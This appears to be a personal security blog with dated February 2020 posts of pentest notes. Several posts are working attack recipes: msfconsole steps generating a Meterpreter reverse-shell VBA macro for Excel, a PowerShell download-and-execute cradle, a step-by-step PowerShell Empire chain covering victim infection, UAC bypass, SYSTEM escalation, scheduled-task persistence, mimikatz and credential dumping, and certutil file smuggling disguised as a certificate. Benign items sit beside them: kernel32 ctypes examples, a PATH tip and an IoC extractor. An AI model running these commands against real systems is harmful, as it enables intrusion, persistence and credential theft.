Saturday, February 15, 2020

python pefile ctypes kernel32.dll examples

import pefile
import ctypes
kfile = pefile.PE(r'Kernel32.dll')


--- *** displays all exports such as *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
 print(export.name)


--- *** executes a command like whoami *** ---
k32.WinExec(b'whoami')


--- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)


--- *** prints length of a string *** ---
k32.lstrlenA(b'something')

--- *** start and stop a timer *** ---
start = k32.GetTickCount()
end = k32.GetTickCount()
elaspedTime = (end-start)/1000

--- *** get process id for the python.exe program running this code *** ---
k32.GetCurrentProcessId()

--- *** get current working directory *** ---
s=ctypes.create_string_buffer(50)
k32.GetCurrentDirectoryA(len(s), s)
string = ""
for i in s:
 if not i.decode() == "\x00":
  string = string + i.decode()

--- *** get environment variables APPDATA value *** --
s=ctypes.create_string_buffer(50)
k32.GetEnvironmentVariableA(b'APPDATA',s,len(s))
string = ""
for i in s:
 if not i.decode() == "\x00":
  string = string + i.decode()

Friday, February 14, 2020

Generate Meterpreter Metasploit VBA

msfconsole
use payload/windows/meterpreter/reverse_tcp
show options
setg LHOST 10.10.10.10
setg LPORT 3000
generate -t vba -f meterpreter.vba

copy & paste into excel

Powershell download cradle

sample download cradle in conjuction with python -m SimpleHTTPServer 80

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) setup a listener
listeners
userlistener http
execute

2.) create a stager
userstager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) setup web server to server malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have victim pc execute reach to attacker pc, download launcher.ps1, execute

5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usermodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getssystem
execute

12.) see where you are
whoami    (should says SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usermodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Thursday, February 13, 2020

Powershell split and sort

In powershell if you have a ugly string like the environment path


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it out and make it pretty like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Tuesday, February 11, 2020

Using certutil.exe to transfer files

1.) create a file to encode/transfer

> Add-Content test.txt "a test"

2.) pack it up as a certificate before transfer

> $raw = get-content -path test.txt -Encoding Byte
> $b64 = [System.Convert]::ToBase64String($raw)
> $begin = "-----BEGIN CERTIFICATE-----"
> $end = "-----END CERTIFICATE-----"
> "$begin$b64$end"|Out-File output.txt

3.) transfer it however you like

4.) receiving end decodes it back to original state with certutil

> certutil.exe -decode output.txt decoded.txt
> get-content decoded.txt
      a test



---
explanation
- create a file you want to encode/transfer
- convert it to raw bytes
- base64 it
- wrap it into a legit certificate file

- now you can transfer it

- then on the receiving end use certutil.exe to decode it back to it's original state

Friday, February 7, 2020

python test ioc extractor

# Steps
# 1.) Drop IoCs [IP address or urls only currentl] from things below into "iocs.txt"
# - Emotet ( https://twitter.com/Cryptolaemus1 )
# - UrlHaus ( https://urlhaus.abuse.ch/downloads/csv_online/ )
# - Phish Tank ( https://www.phishtank.com/phish_search.php?page=1&active=y&valid=y&Search=Search )
# - Trickbot ( https://twitter.com/search?q=%23trickbot&src=typed_query&f=live )
# 2.) run script
import sys
import os
import re
from urllib.parse import urlparse
debug = 0
filepath = 'iocs.txt'
ipfilepath = 'ips.txt'
dnsfilepath = 'dns.txt'
ioccontainswhitelist = [
".sendgrid.net"
]
iocwhitelist = [
"google.com",
"www.google.com",
"urlhaus.abuse.ch",
"pastebin.com",
"ak.imgfarm.com",
"docs.google.com",
"drive.google.com",
"i.imgur.com",
"img.sobot.com",
"imgur.com",
"www.imgur.com",
"raw.githubusercontent.com",
"github.com",
"www.github.com",
"adobe.com",
"www.adobe.com",
"ibm.com",
"www.ibm.com",
"dell.com",
"www.dell.com",
"bing.com",
"www.bing.com",
"msn.com",
"www.msn.com",
"documentcloud.adobe.com",
"cisco.com",
"www.cisco.com",
"oshkosh.webex.com",
"l.yimg.com",
"yimg.com",
"dl.dropboxusercontent.com",
"dropbox.com",
"www.dropbox.com",
"godaddy.com",
"godaddysites.com",
"files.constantcontact.com",
"ipinfo.io",
"bit.ly",
"onedrive.live.com",
"000webhostapp.com",
"storage.googleapis.com",
"wikileaks.org",
"forms.gle",
"go2l.ink",
"capesandbox.com",
"twitter.com",
"paste.cryptolaemus.com",
"cryptolaemus.com",
"gist.githubusercontent.com",
"bitbucket.org",
"img1.wsimg.com",
"cdn.discordapp.com",
"web.mit.edu",
"bit.do",
"na3.docusign.net",
"sway.office.com",
"sites.google.com",
"aka.ms",
"login.microsoftonline.com",
"track.smtpsendmail.com",
"r20.rs6.net",
"files.gamebanana.com",
"sems.sas.com"
]
with open(filepath) as fp:
 rawLine = fp.readline().rstrip()
 ipResults = []
 dnsResults = []
 while rawLine:
  if debug:
   print("DEBUG: reviewing %s" % rawLine)
  found = 0
  ioc = None
  isIp = 0
  isDns = 0
  ipRegex = re.findall( r'(\d+\.\d+\.\d+\.\d+)', rawLine )
  if ipRegex:
   ioc = ipRegex[0]
   isIp = 1
   if debug:
    print("DEBUG: IP address %s" % ioc)
  if not ioc:
   urlRegex = re.search('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', rawLine) 
   if urlRegex:
    parts = urlRegex.group().split('/')
    if parts and len(parts) > 2:
     ioc = urlRegex[0].split('/')[2]
     isDns = 1
     if debug:
      print("DEBUG: url with http %s" % ioc)
   if not ioc:
    if debug:
     print("DEBUG: checking url 2nd time")
    urlRegexV2 = re.search('^([a-zA-Z.]+\.([a-zA-Z]){2,7}\/.*)$', rawLine) 
    if urlRegexV2:
     parts = urlRegexV2.group().split('/')
     if parts and len(parts) > 0:
      ioc = parts[0]
      isDns = 1
      if debug:
       print("DEBUG: url without http %s" % ioc)
    else:
     if debug:
      print("DEBUG: checking url 3rd time")
     urlTest = re.search('^([a-zA-Z.]+)\.([a-zA-Z]){2,7}$', rawLine) 
     if urlTest:
      ioc = rawLine
      isDns = 1
      if debug:
       print("DEBUG: url domain only %s" % ioc)
  if ioc:
   ioc = ioc.lower()
   for ignoredIoc in iocwhitelist:
    if ioc == ignoredIoc.lower():
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   for ignoredIoc in ioccontainswhitelist:
    if ignoredIoc.lower() in ioc:
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   if found == 0:
    if "..." not in ioc:
     if isIp:
      ipResults.append(ioc)
     if isDns:
      dnsResults.append(ioc)
  rawLine = fp.readline()

ipResults = sorted(set(ipResults))
dnsResults = sorted(set(dnsResults))

with open(ipfilepath,"w+") as fp:
 for ioc in ipResults:
  fp.write("%s\n" % ioc)
 if len(ipResults) > 0:
  print("%s created" % ipfilepath)

with open(dnsfilepath,"w+") as fp:
 for ioc in dnsResults:
  fp.write("%s\n" % ioc)
 if len(dnsResults) > 0:
  print("%s created" % dnsfilepath)